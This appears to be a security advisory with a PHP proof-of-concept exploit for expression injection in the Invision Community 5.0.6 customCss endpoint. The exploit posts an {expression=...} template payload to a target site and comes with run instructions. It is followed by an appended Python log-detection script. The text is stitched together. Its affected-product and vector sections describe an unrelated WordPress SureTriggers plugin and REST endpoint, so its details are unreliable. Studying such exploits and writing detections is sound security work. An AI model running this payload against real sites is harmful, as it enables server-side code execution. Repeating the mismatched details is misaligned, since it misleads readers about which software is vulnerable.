Invision Community 5.0.6 customCss Expression Injection

=============================================================================================================================================
| # Title : Invision Community 5.0.6 customCss Expression Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://invisioncommunity.com/release-notes-v5/ |
=============================================================================================================================================

[+] Summary : Expression Injection - Server-Side Template Injection (SSTI)

A vulnerability exists in the `customCss` endpoint: the `content`
parameter is parsed for `{expression="..."}` tags,
allowing template expressions to be evaluated.


[+] References : https://packetstorm.news/files/id/194569/ (CVE-2025-47916)

[+] Affected Product
- WordPress Plugin: SureTriggers
- Version: <= 1.0.78

[+] Vector
Unauthenticated REST access:
/wp-json/sure-triggers/v1/automation/action

[+] Research Notes
The endpoint accepts JSON payloads describing automation tasks.
In vulnerable versions, no authorization validation is performed
before processing the request. This POC validates reachability only.

--------------------------------------------------------------------
### SAFE PHP POC
--------------------------------------------------------------------
<?php
/*
* Invision Community 5.0.6 customCss Expression Injection - Safe PoC
* Author: Indoushka
*/

$target = "http://victim.com"; // target base URL
$endpoint = $target . "/index.php";

// Safe Payload (No RCE)
$expr = '{expression="print(\'Indoushka\')"}';

// POST body
$data = array(
'app' => 'core',
'module' => 'system',
'controller' => 'themeeditor',
'do' => 'customCss',
'content' => $expr
);

// Send request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
curl_close($ch);

// Display server response
echo "===== Safe PoC Response =====\n";
echo $response;
?>

-------------------
### SAVE & RUN
-------------------

1. Save as:
invision_safe_poc.php

2. Run:
php invision_safe_poc.php
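
A detection check for the request this advisory describes, added here as an example (not code from the advisory or from Invision Community): it flags logged requests that route to the `customCss` action and carry an `{expression=` tag in `content`. It assumes the log source records URL-encoded form bodies; the record layout, function names and sample records are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Route parameters the advisory's request uses to reach the customCss action.
ROUTE = {"app": "core", "module": "system",
         "controller": "themeeditor", "do": "customCss"}
# Template expression tag named in the advisory, tolerant of spacing and case.
EXPR_TAG = re.compile(r"\{\s*expression\s*=", re.IGNORECASE)


def merged_params(url, body):
    """Merge URL-decoded query-string and form-body parameters."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    return params


def classify(url, body=""):
    """Return 'expression', 'route-only' or None for one logged request."""
    params = merged_params(url, body)
    for key, want in ROUTE.items():
        if want.lower() not in (v.lower() for v in params.get(key, [])):
            return None  # not the customCss action
    if any(EXPR_TAG.search(v) for v in params.get("content", [])):
        return "expression"
    return "route-only"


def scan(records):
    """Return (source, verdict) for each record that reaches the endpoint."""
    verdicts = ((src, classify(url, body)) for src, url, body in records)
    return [(src, v) for src, v in verdicts if v]


# Constructed sample records (source address, URL, form body); not real traffic.
SAMPLE_LOG = [
    ("198.51.100.7", "/index.php",
     "app=core&module=system&controller=themeeditor&do=customCss"
     "&content=%7Bexpression%3D%22print%28%27x%27%29%22%7D"),
    ("198.51.100.7",
     "/index.php?app=core&module=system&controller=themeeditor&do=customCss", ""),
    ("203.0.113.9", "/index.php",
     "app=core&module=system&controller=login&content=%7Bexpression%3D1%7D"),
]

if __name__ == "__main__":
    for source, verdict in scan(SAMPLE_LOG):
        print(source, verdict)
```

PHP's cURL sends an array passed to CURLOPT_POSTFIELDS as multipart/form-data, so a sensor fed by such requests needs a multipart decoder in front of `classify`.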



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸